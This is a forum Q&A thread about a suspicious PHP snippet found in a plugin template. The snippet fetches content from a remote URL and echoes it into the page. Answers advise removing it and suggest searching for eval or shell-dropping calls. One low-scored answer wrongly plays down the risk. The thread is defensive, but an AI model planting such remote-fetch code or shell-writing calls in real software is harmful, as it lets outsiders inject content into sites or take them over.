# strange code embedded in php tmpl file

Tags: php, file-get-contents

I have just found this embedded in a plugin I am using (at the start of a tmpl file before the html)...

Should I be worried?
Can I remove it?

```
<?php 
$author = @file_get_contents('http://d5827db8276672d15fca-1e2d3239e5a8580a4f85f7906852eb87.r51.cf1.rackcdn.com/author3c.php');
echo $author;
?>
```

Thanks

Comment: Though the original intent of those lines is unknown, they are a very serious security risk and should be removed.

Answer (score 2, accepted):

I just visited that url and it's just an empty php file so unless somewhere it states that it must be left in, I would remove it.

EDIT::

When I say it's an empty php file it actually popped up a download dialog to download the file, it didn't just serve me an empty page.

Answer (score 1):

Id remove it, if you dont have control over what goes in that file then your at a security risk, regardless of what the author of the template says.

Check the rest of your code for `eval($author)` or `file_put_contents('shell.php',$author);` ect

Answer (score 0):

`file_get_contents` just **loads all content** of a file into a variable and **don't execute a code**.

I recommend you first check if there's not a critical tags or codes in that file, then you can safety remove it.

For more information see this page on PHP.net: [file_get_contents manual](http://php.net/file_get_contents).